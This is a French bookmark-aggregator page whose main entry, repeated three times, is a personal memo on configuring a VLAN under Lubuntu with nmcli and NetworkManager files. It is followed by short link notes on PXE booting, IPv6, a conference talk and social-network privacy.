Liens en vrac de SimonLefort Note: Configuration de vlan sous Lubuntu.
J'ai eu des vlans à configurer sous Lubuntu. Je note quelques astuces pour m'y retrouver la prochaine fois.

Installer la base :

    $ sudo apt-get install vlan

Pour ajouter un vlan géré par NetworkManager, on utilise *nmcli* (gestion en ligne de commande de NetworkManager). On peut donc ajouter un vlan comme ceci :

    $ sudo nmcli con add type vlan con-name vlan10 dev eth0 id 10 ip4 192.168.1.3/24 gw4 192.168.1.1

Une fois cette ligne tapée, on peut retrouver notre vlan avec nmcli :

    # nmcli con show
    NAME                UUID                                  TYPE            DEVICE    
    Wired connection 1  e70f5401-2940-4105-a7b9-73e8e0b6333b  802-3-ethernet  eth0
    vlan10              f95563b8-af23-4b43-b8d4-99549b53625f  vlan            mon-vlan

Ou comme ça :

    # nmcli device
    DEVICE     TYPE      STATE        CONNECTION        
    eth0     ethernet  connected    Wired connection 1
    eth0.10  vlan      connected    vlan10            
    lo         loopback  unmanaged    --  

Les configurations sont dans ce dossier :

    # ls -alh /etc/NetworkManager/system-connections/
    total 36K
    drw------- 2 root root 4,0K juil.  7 14:12 .
    drwxr-xr-x 8 root root 4,0K juin  30 09:52 ..
    -rw------- 1 root root  376 juil.  7 14:12 vlan10
    -rw------- 1 root root  354 juil.  7 10:54 Wired connection 1

On peut ensuite modifier la configuration directement dans le fichier ou via NetworkManager de manière graphique. (Pour mettre un nom, par exemple. Ou désactiver l'ipv6, rajouter les dns, etc.)
Un détail sur la configuration :
   
    # sudo cat /etc/NetworkManager/system-connections/vlan20
    [connection]
    id=vlan10
    uuid=973d0cca-f6e3-4db7-a4ad-31d9930bd6c5
    type=vlan
    interface-name=management
    permissions=
    secondaries=
    timestamp=1467893469
   
    [vlan]
    egress-priority-map=
    flags=1
    id=10
    ingress-priority-map=
    parent=eth0
   
    [ipv4]
    address1=192.168.1.3/24,192.168.1.1
    dns-search=
    method=manual
   
    [ipv6]
    addr-gen-mode=stable-privacy
    dns-search=
    ip6-privacy=0
    method=ignore

Il y a pas mal d'options, n'hésitez pas à fouiller.
(Permalink)
Liens en vrac de SimonLefort Note: Configuration de vlan sous Lubuntu.
J'ai eu des vlans à configurer sous Lubuntu. Je note quelques astuces pour m'y retrouver la prochaine fois.

Installer la base :

    $ sudo apt-get install vlan

Pour ajouter un vlan géré par NetworkManager, on utilise *nmcli* (gestion en ligne de commande de NetworkManager). On peut donc ajouter un vlan comme ceci :

    $ sudo nmcli con add type vlan con-name vlan10 dev eth0 id 10 ip4 192.168.1.3/24 gw4 192.168.1.1

Une fois cette ligne tapée, on peut retrouver notre vlan avec nmcli :

    # nmcli con show
    NAME                UUID                                  TYPE            DEVICE    
    Wired connection 1  e70f5401-2940-4105-a7b9-73e8e0b6333b  802-3-ethernet  eth0
    vlan10              f95563b8-af23-4b43-b8d4-99549b53625f  vlan            mon-vlan

Ou comme ça :

    # nmcli device
    DEVICE     TYPE      STATE        CONNECTION        
    eth0     ethernet  connected    Wired connection 1
    eth0.10  vlan      connected    vlan10            
    lo         loopback  unmanaged    --  

Les configurations sont dans ce dossier :

    # ls -alh /etc/NetworkManager/system-connections/
    total 36K
    drw------- 2 root root 4,0K juil.  7 14:12 .
    drwxr-xr-x 8 root root 4,0K juin  30 09:52 ..
    -rw------- 1 root root  376 juil.  7 14:12 vlan10
    -rw------- 1 root root  354 juil.  7 10:54 Wired connection 1

On peut ensuite modifier la configuration directement dans le fichier ou via NetworkManager de manière graphique. (Pour mettre un nom, par exemple. Ou désactiver l'ipv6, rajouter les dns, etc.)
Un détail sur la configuration :
   
    # sudo cat /etc/NetworkManager/system-connections/vlan20
    [connection]
    id=vlan10
    uuid=973d0cca-f6e3-4db7-a4ad-31d9930bd6c5
    type=vlan
    interface-name=management
    permissions=
    secondaries=
    timestamp=1467893469
   
    [vlan]
    egress-priority-map=
    flags=1
    id=10
    ingress-priority-map=
    parent=eth0
   
    [ipv4]
    address1=192.168.1.3/24,192.168.1.1
    dns-search=
    method=manual
   
    [ipv6]
    addr-gen-mode=stable-privacy
    dns-search=
    ip6-privacy=0
    method=ignore

Il y a pas mal d'options, n'hésitez pas à fouiller.
(Permalink)
Liens en vrac de SimonLefort Note: Configuration de vlan sous Lubuntu.
J'ai eu des vlans à configurer sous Lubuntu. Je note quelques astuces pour m'y retrouver la prochaine fois.

Installer la base :

    $ sudo apt-get install vlan

Pour ajouter un vlan géré par NetworkManager, on utilise *nmcli* (gestion en ligne de commande de NetworkManager). On peut donc ajouter un vlan comme ceci :

    $ sudo nmcli con add type vlan con-name vlan10 dev eth0 id 10 ip4 192.168.1.3/24 gw4 192.168.1.1

Une fois cette ligne tapée, on peut retrouver notre vlan avec nmcli :

    # nmcli con show
    NAME                UUID                                  TYPE            DEVICE    
    Wired connection 1  e70f5401-2940-4105-a7b9-73e8e0b6333b  802-3-ethernet  eth0
    vlan10              f95563b8-af23-4b43-b8d4-99549b53625f  vlan            mon-vlan

Ou comme ça :

    # nmcli device
    DEVICE     TYPE      STATE        CONNECTION        
    eth0     ethernet  connected    Wired connection 1
    eth0.10  vlan      connected    vlan10            
    lo         loopback  unmanaged    --  

Les configurations sont dans ce dossier :

    # ls -alh /etc/NetworkManager/system-connections/
    total 36K
    drw------- 2 root root 4,0K juil.  7 14:12 .
    drwxr-xr-x 8 root root 4,0K juin  30 09:52 ..
    -rw------- 1 root root  376 juil.  7 14:12 vlan10
    -rw------- 1 root root  354 juil.  7 10:54 Wired connection 1

On peut ensuite modifier la configuration directement dans le fichier ou via NetworkManager de manière graphique. (Pour mettre un nom, par exemple. Ou désactiver l'ipv6, rajouter les dns, etc.)
Un détail sur la configuration :
   
    # sudo cat /etc/NetworkManager/system-connections/vlan20
    [connection]
    id=vlan10
    uuid=973d0cca-f6e3-4db7-a4ad-31d9930bd6c5
    type=vlan
    interface-name=management
    permissions=
    secondaries=
    timestamp=1467893469
   
    [vlan]
    egress-priority-map=
    flags=1
    id=10
    ingress-priority-map=
    parent=eth0
   
    [ipv4]
    address1=192.168.1.3/24,192.168.1.1
    dns-search=
    method=manual
   
    [ipv6]
    addr-gen-mode=stable-privacy
    dns-search=
    ip6-privacy=0
    method=ignore

Il y a pas mal d'options, n'hésitez pas à fouiller.
(Permalink)
Nymous dans le nuage Blog Stéphane Bortzmeyer: Exposé « Objets qui communiquent entre eux ou bien esclaves du cloud ? » aux journées FedeRez

Merci à FedeRez (https://www.federez.net) d'organiser ce genre d'événements, c'était encore une fois vachement cool ! Et merci d'inviter des gens comme Stéphane Bortzmeyer, on le rencontre pas tous les jours ^^
Permalink

Lien divers et variés Démarrage PXE avec Openwrt, Dnsmasq et FreeNAS - Xieme-Art

Sur mon blog : paramétrer d'amas sur OpenWRT pour permettre un démarrage PXE multi l'architecture (EFI32,EFI64 et BIOS).
Permalink

Lien divers et variés Démarrage PXE avec Openwrt, Dnsmasq et FreeNAS - Xieme-Art
Sur mon blog : paramétrer d'amas sur OpenWRT pour permettre un démarrage PXE multi l'architecture (EFI32,EFI64 et BIOS).
Permalink
Lien divers et variés Démarrage PXE avec Openwrt, Dnsmasq et FreeNAS - Xieme-Art

Sur mon blog : paramétrer d'amas sur OpenWRT pour permettre un démarrage PXE multi l'architecture (EFI32,EFI64 et BIOS).
Permalink

Lien divers et variés Démarrage PXE avec Openwrt, Dnsmasq et FreeNAS - Xieme-Art

Sur mon blog : paramétrer d'amas sur OpenWRT pour permettre un démarrage PXE multi l'architecture (EFI32,EFI64 et BIOS).
Permalink

Olivier Dᴏꜱꜱᴍᴀɴɴ Table des matières - Livre IPv6
Apprendre IPv6 avec les mises à jour !
Permalink
Les liens de Gatitac Parents, vous ne voyez pas les dangers pour vos enfants
Bilet de blog d’un juriste sur les dangers de publier des photos et infos de ses enfants ou ceux des autres sur les réseaux sociaux
via Gnujeremie et Laurent Chemla https://twitter.com/gnujeremie/status/633916998511144961
(Permalink)
Liens d'un Biblio-Manchot [Ils se sont lancés sur les réseaux sociaux] Episode 32 : les bibliothèques - Formation réseaux sociaux - Formation aux réseaux sociaux par Clément Pellerin
Quelques exemples d'utilisation des réseaux sociaux par les bibliothèques.
Permalink
Liens d'un Biblio-Manchot [Ils se sont lancés sur les réseaux sociaux] Episode 32 : les bibliothèques - Formation réseaux sociaux - Formation aux réseaux sociaux par Clément Pellerin
Quelques exemples d'utilisation des réseaux sociaux par les bibliothèques.
Permalien
Lien divers et variés Configuring PXE Boot for EFI

La documentation Red-Hat sur la configuration du serveur DHCP et de syslinux pour pouvoir démarrer en PXE sur une machine équipée d'un UEFI. Attention toutefois, il faut désactiver le secure boot.
Permalink

Lien divers et variés Configuring PXE Boot for EFI
La documentation Red-Hat sur la configuration du serveur DHCP et de syslinux pour pouvoir démarrer en PXE sur une machine équipée d'un UEFI. Attention toutefois, il faut désactiver le secure boot.
Permalink
Lien divers et variés Configuring PXE Boot for EFI

La documentation Red-Hat sur la configuration du serveur DHCP et de syslinux pour pouvoir démarrer en PXE sur une machine équipée d'un UEFI. Attention toutefois, il faut désactiver le secure boot.
Permalink

Lien divers et variés Configuring PXE Boot for EFI

La documentation Red-Hat sur la configuration du serveur DHCP et de syslinux pour pouvoir démarrer en PXE sur une machine équipée d'un UEFI. Attention toutefois, il faut désactiver le secure boot.
Permalink

La vache libre La pourritose: Accéder à Ubuntu depuis Internet sur Android
À garder sous la patte en cas de besoin.
(Permalink)